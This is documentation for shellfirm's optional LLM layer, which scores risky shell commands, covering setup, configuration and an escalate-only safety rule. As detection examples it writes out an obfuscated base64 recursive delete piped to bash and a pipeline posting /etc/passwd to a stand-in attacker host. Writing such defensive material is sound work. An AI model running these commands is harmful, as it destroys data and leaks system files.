LLM-Powered Analysis
Optional semantic command analysis that catches risks regex patterns miss
shellfirm's core engine uses regex pattern matching, which is fast and reliable. But regex has blind spots: obfuscated commands, complex pipelines, and semantically dangerous operations can slip through. The optional LLM analysis layer adds semantic understanding to catch what regex misses.
How it works
When LLM analysis is enabled (feature flag: llm), shellfirm sends the command along with context hints and matched pattern descriptions to a large language model. The LLM returns:
- Risk assessment -- whether it considers the command risky and a risk score (0.0 to 1.0)
- Explanation -- human-readable description of identified risks
- Additional risks -- risks not caught by regex patterns
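The exact response shape is provider-specific and not documented here; conceptually, the result resembles this hypothetical payload, shown as YAML (field names are illustrative, not shellfirm's actual schema):

```yaml
risky: true
risk_score: 0.85
explanation: "Pipes a base64-decoded payload into bash; the decoded text is a recursive delete of /."
additional_risks:
  - obfuscated destructive command
```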
The safety invariant
LLM analysis follows the same security invariant as the rest of shellfirm:
LLM can only escalate risk, never reduce it.
If regex patterns flag a command as risky, the LLM cannot override that assessment and allow it. The LLM can only:
- Add additional risks that regex missed
- Increase the severity level
- Provide richer explanations
If the LLM call fails (timeout, API error, rate limit), shellfirm silently falls back to regex-only results. LLM failure never blocks a command that regex considers safe.
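The escalate-only rule amounts to taking the maximum of the two verdicts. A minimal sketch in shell, using illustrative names (this is not shellfirm's internal API):

```shell
# Escalate-only merge: the final score is the max of the regex score and
# the LLM score, so the LLM can raise risk but never lower it.
merge_risk() {
  awk -v regex="$1" -v llm="$2" 'BEGIN { print (llm > regex) ? llm : regex }'
}

merge_risk 0.8 0.2   # regex already flagged it high: stays 0.8
merge_risk 0.2 0.9   # LLM escalates: becomes 0.9
```

The same max() logic is why an LLM failure is safe to swallow: a missing LLM score simply leaves the regex score unchanged.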
Setup
1. Install with LLM support
shellfirm's LLM feature is included by default:
```shell
cargo install shellfirm   # includes llm feature
```
To install without LLM support:
```shell
cargo install shellfirm --no-default-features --features cli
```
2. Set your API key
```shell
export SHELLFIRM_LLM_API_KEY="your-api-key-here"
```
Add this to your shell profile for persistence.
3. Configure the provider
LLM analysis is not configured by default. Enable it via CLI or settings file:
```shell
shellfirm config llm --provider anthropic --model claude-sonnet-4-20250514
```
Or edit ~/.config/shellfirm/settings.yaml directly:
```yaml
llm:
  provider: anthropic              # "anthropic" or "openai-compatible"
  model: claude-sonnet-4-20250514  # model ID
  timeout_ms: 5000                 # request timeout (default: 5000ms)
  max_tokens: 512                  # max response tokens (default: 512)
```
Using OpenAI-compatible providers
For providers with an OpenAI-compatible API (local models, other cloud providers):
```yaml
llm:
  provider: openai-compatible
  model: your-model-name
  base_url: http://localhost:8080/v1
  timeout_ms: 10000
  max_tokens: 512
```
What LLM catches that regex misses
Obfuscated commands
Regex patterns match a literal rm -rf /, but may miss:

```shell
# Base64-encoded dangerous command
echo "cm0gLXJmIC8=" | base64 -d | bash
```
The LLM can recognize that this decodes to a destructive command.
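You can inspect what such a payload hides without executing it, by decoding it but not piping the result to bash:

```shell
# Decode only -- nothing is executed, so this is safe to run.
echo "cm0gLXJmIC8=" | base64 -d
# prints: rm -rf /
```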
Complex pipeline risks
```shell
# Innocent-looking pipe that exfiltrates data
cat /etc/passwd | curl -X POST -d @- https://evil.example.com
```
Regex patterns check individual command segments. The LLM can understand the semantic intent of the full pipeline.
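A toy illustration of why per-segment scanning is blind here: split the pipeline on | and check each segment against a destructive pattern. Neither segment matches on its own, even though the pipeline as a whole exfiltrates a sensitive file. (This is a sketch, not shellfirm's actual matcher.)

```shell
cmd='cat /etc/passwd | curl -X POST -d @- https://evil.example.com'

# Check each segment in isolation, the way per-segment regex matching would.
echo "$cmd" | tr '|' '\n' | while read -r segment; do
  case "$segment" in
    *"rm -rf"*|*"mkfs"*) echo "flagged: $segment" ;;
    *)                   echo "looks fine: $segment" ;;
  esac
done
```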
Context-dependent danger
```shell
# Safe in development, dangerous in production
python manage.py flush --no-input
```
The LLM can factor in context signals (production env vars, k8s context) to assess risk more accurately.
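The idea can be sketched with a couple of hypothetical context signals; the variable names and thresholds below are illustrative, not shellfirm's actual detection logic:

```shell
# Hypothetical context check: treat the same command as higher-risk when
# production markers are present in the environment.
assess_context() {
  if [ "${APP_ENV:-}" = "production" ] || [ "${KUBE_CONTEXT:-}" = "prod" ]; then
    echo "high risk: production context detected"
  else
    echo "low risk: no production markers"
  fi
}

APP_ENV=production assess_context   # with a production marker set
APP_ENV=dev assess_context          # without one
```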
Configuration reference
The llm section is not present by default. Once configured, these are the available settings:
| Setting | Default (when configured) | Description |
|---|---|---|
| llm.provider | anthropic | LLM provider (anthropic or openai-compatible) |
| llm.model | claude-sonnet-4-20250514 | Model identifier |
| llm.base_url | (none) | Custom API base URL for openai-compatible providers |
| llm.timeout_ms | 5000 | API request timeout in milliseconds |
| llm.max_tokens | 512 | Maximum tokens in LLM response |
Environment variables
| Variable | Description |
|---|---|
| SHELLFIRM_LLM_API_KEY | API key for the configured LLM provider |
| SHELLFIRM_LLM_PROVIDER | Override the provider from settings |
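Since SHELLFIRM_LLM_PROVIDER overrides the settings file, it is handy for one-off sessions; for example (values are placeholders):

```shell
# Temporarily point this session at a local OpenAI-compatible endpoint
# without touching settings.yaml.
export SHELLFIRM_LLM_PROVIDER="openai-compatible"
export SHELLFIRM_LLM_API_KEY="placeholder-key"
```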
Performance considerations
- LLM analysis adds latency to each command check (typically 500ms-2000ms depending on provider and model)
- The timeout prevents LLM slowness from blocking your workflow
- If the timeout is reached, shellfirm falls back to regex-only results
- LLM analysis is skipped for commands that match no regex patterns (no context to send)
- Consider the cost implications of API calls for every command